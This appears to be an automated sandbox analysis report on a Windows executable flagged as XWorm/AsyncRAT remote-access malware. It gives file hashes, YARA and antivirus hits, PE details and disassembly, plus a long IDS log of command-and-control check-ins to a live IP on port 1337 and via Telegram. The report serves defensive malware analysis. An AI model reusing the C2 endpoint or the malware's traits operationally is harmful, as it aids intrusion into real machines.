SSDEEP: 24:8H67Wl2Q2ncREgKpDw7APEV79pXJDJUwqygm:8IQ2ncRi0sPEVhdJDJmyg
MD5: E25042DF17441038287CB1EA300C5AE6
SHA1: 3CCE5ECEF60D5A559161A717CCF95744674CCD40
SHA-256: D41F990002825038FFEC485769BCF165235CDABD48A42B6A4CF86BAAD68B9A14
SHA-512: 1AA7A741E1F15D1F52D972F35F280648CC37A8F34CCA3FBEC05DAD165E933410C6DA551085D9AFE44F10CC35FE3A3C038CB3F56CC028129CD96174E806E5E676
Malicious: false
                                                                                                                Preview:L..................F.... ....*%..=...x..=...*%..=...8........................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....w..=...Oj..=......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=wY`...........................3*N.A.p.p.D.a.t.a...B.P.1.....wY\...Local.<......EW.=wY`............................6c.L.o.c.a.l.....N.1.....wY`...Temp..:......EW.=wY`............................Z..T.e.m.p.....b.2..8..wYf. .svchost.exe.H......wYf.wYf...........................*.A.s.v.c.h.o.s.t...e.x.e.......`...............-......._............Y.d.....C:\Users\user\AppData\Local\Temp\svchost.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.s.v.c.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......571345...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS.
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):2464
Entropy (8bit):3.250685543696675
Encrypted:false
SSDEEP:24:QOaqdmuF3rfNj+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVy:FaqdF7fp+AAHdKoqKFxcxkF1j
MD5:F644E806C54C2BDD24A53CE4DDD029D0
SHA1:B64483AC96E3EE4C669DE95F2BCAC0418EEADB1A
SHA-256:9841815400D84B53D3B077395C1F0D898AEC1A6D26540C323F29906BB89942D8
SHA-512:7307AF6DB2487645EB313CF83C48D38816528818158EDEF471318F1327F22ECF2688752FD05AC7C890C3124E198286F10460D0E128CF183BE73535D27CA344C0
Malicious:false
                                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. N.o.v. .. 2.3. .. 2.0.2.4. .1.6.:.3.9.:.3.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
Process:C:\Windows\System32\curl.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):79872
Entropy (8bit):5.969526908188351
Encrypted:false
SSDEEP:1536:K2Kq6qxHg+vmlFB+dbPHq0FzvoqH7fgHOkVzQOCpG:LKIxHAFcdbPJHsHOvhG
MD5:9D9D23A73F3B3F53E8581D8BB31953C4
SHA1:EADD04F6DEF413C3987529AC88E5E69C89563852
SHA-256:4C17F40A56758579CDC2356A9276F92CFA3ED2E56DBB89816E5EAA15CFF0E6F3
SHA-512:FCAE7AE9D0EAB656CC37469A3AAB9B5A6C14FDE68EB3DD576F8BA8C7DC24FCAF7C8140C5D565E843FBD9A482F29D37A3093B7C95717924A4AA11F3B0704B7622
Malicious:true
Yara Hits:
• Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\StartMenuExperienceHost.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
File type:PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):6.252474904412125
TrID:
• Win64 Executable Console (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:18sFhgSyVK.exe
File size:89'088 bytes
MD5:4e0d7812adef8e43e4eae77bf07dcc94
SHA1:2499fdf4c66070ec1b4d7c4e499f6dbc56565767
SHA256:22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc
SHA512:2cc49fce8a77a41bfee1e3ff3c20db247ac3620bfdbfb0334e963450990ff6620b836a497db67aa3062b56c1de94983c5501a795074177afa486f798fea16156
SSDEEP:1536:EOpH997KeO04edzED4cwhhJQAfxmr5CpPjvuCq21:Emd/r4edAfMQ8x+MPaH21
TLSH:6193B52DB8BB0B69C9608D7D823942C2F316D54E1FB85E7BB6E904692D15EDC2F64C03
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P+...J...J...J...2C..J.......J.......J.......J.......J.._2...J...J..~J.......J..../..J.......J..Rich.J..................PE..d..
Icon Hash:00928e8e8686b000
Entrypoint:0x1400107a0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows cui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x6740E5F1 [Fri Nov 22 20:13:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:9ba39f7e41cae1fe4a814e3cac8ef123
Instruction
dec eax
sub esp, 28h
call 00007F5B8CC4D224h
dec eax
add esp, 28h
jmp 00007F5B8CC4C9C7h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [0000289Bh]
dec eax
mov ecx, ebx
call dword ptr [0000288Ah]
call dword ptr [00002894h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00002888h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [0000287Ch]
test eax, eax
je 00007F5B8CC4CB59h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [00006A42h]
call 00007F5B8CC4CBFEh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [00006B29h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [00006AB9h], eax
dec eax
mov eax, dword ptr [00006B12h]
dec eax
mov dword ptr [00006983h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [00006A87h], eax
mov dword ptr [0000695Dh], C0000409h
mov dword ptr [00006957h], 00000001h
mov dword ptr [00006961h], 00000001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15974 | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x1e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x18000 | 0x7bc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0x64 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x144b0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x14370 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x308 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11097 | 0x11200 | 982e9bd125639b7a565610da114058de | False | 0.30082401916058393 | data | 6.218094948449805 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x36c2 | 0x3800 | 3a813dbc393fccab82a240949403dacd | False | 0.4609375 | data | 5.464046020236877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0x780 | 0x200 | b635e6ee43bdfadc6905884afcfd2da7 | False | 0.240234375 | DOS executable (block device driver) | 2.115824836017978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x18000 | 0x7bc | 0x800 | a6396d076eee241b53b734db1ba13355 | False | 0.4580078125 | data | 4.715636917167317 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x19000 | 0x1e8 | 0x200 | c1bc7cea80222b80fca5f84b4a3c2242 | False | 0.541015625 | data | 4.7644199514493595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a000 | 0x64 | 0x200 | 6634e07bc7ac95cca7424058026329df | False | 0.216796875 | data | 1.3014480346693047 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x19060 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
KERNEL32.dll | SetConsoleTextAttribute, GetStdHandle, Sleep, CreateThread, Beep, GetConsoleWindow, SetConsoleTitleW, GetCurrentThreadId, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead
USER32.dll | FindWindowA, SetLayeredWindowAttributes, GetAsyncKeyState, ShowWindow, GetWindowLongW, SetWindowLongW
MSVCP140.dll | ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ?good@ios_base@std@@QEBA_NXZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, _Query_perf_frequency, ?_Throw_Cpp_error@std@@YAXH@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, _Cnd_do_broadcast_at_thread_exit, _Query_perf_counter, _Thrd_detach, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z
VCRUNTIME140_1.dll | __CxxFrameHandler4
VCRUNTIME140.dll | memcmp, __std_terminate, __std_exception_copy, __current_exception, __current_exception_context, __C_specific_handler, memcpy, memset, _CxxThrowException, __std_exception_destroy
api-ms-win-crt-filesystem-l1-1-0.dll | remove
api-ms-win-crt-runtime-l1-1-0.dll | __p___argv, _register_thread_local_exe_atexit_callback, __p___argc, _initterm_e, _initterm, _get_initial_narrow_environment, _c_exit, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit, _invalid_parameter_noinfo_noreturn, terminate, system, _beginthreadex, _exit
api-ms-win-crt-heap-l1-1-0.dll | free, _set_new_mode, malloc, _callnewh
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-stdio-l1-1-0.dll | _set_fmode, __p__commode
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T21:03:15.686107+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.7 | 49704 | 149.154.167.220 | 443 | TCP
2024-11-23T21:03:31.312688+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:03:31.666395+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:32.015251+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:03:35.005493+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:35.005493+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:44.735562+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:44.739529+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:03:57.811744+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:03:57.818615+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:03:58.126970+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:05.021284+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:05.021284+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:10.892727+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:10.894733+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:23.967438+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:23.980400+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:31.734513+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:31.739407+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:32.653666+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:32.655876+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:35.036903+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:35.036903+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:36.981287+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:36.985967+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:48.781948+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:48.784656+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:49.282930+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:49.285345+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:52.904777+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:52.906436+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:54.388194+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.489032+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:54.589383+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.608635+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:54.690403+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.728415+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:04:54.801517+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:04:54.848808+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:00.363403+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.439092+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:00.564582+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.566683+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:00.640704+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.730220+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:00.760385+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:00.849831+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:03.840384+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:03.842107+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:05.053094+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:05.053094+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:07.107572+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:07.111881+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:07.308687+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:07.310411+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:09.514457+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:09.516554+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:12.481178+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:12.594933+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:12.682711+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:12.720220+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:12.939275+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:12.941567+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:14.950023+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:14.951464+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:26.887003+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:26.894889+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:31.287399+0100 | 2853193 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:31.641024+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:05:31.653759+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
2024-11-23T21:05:35.069157+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
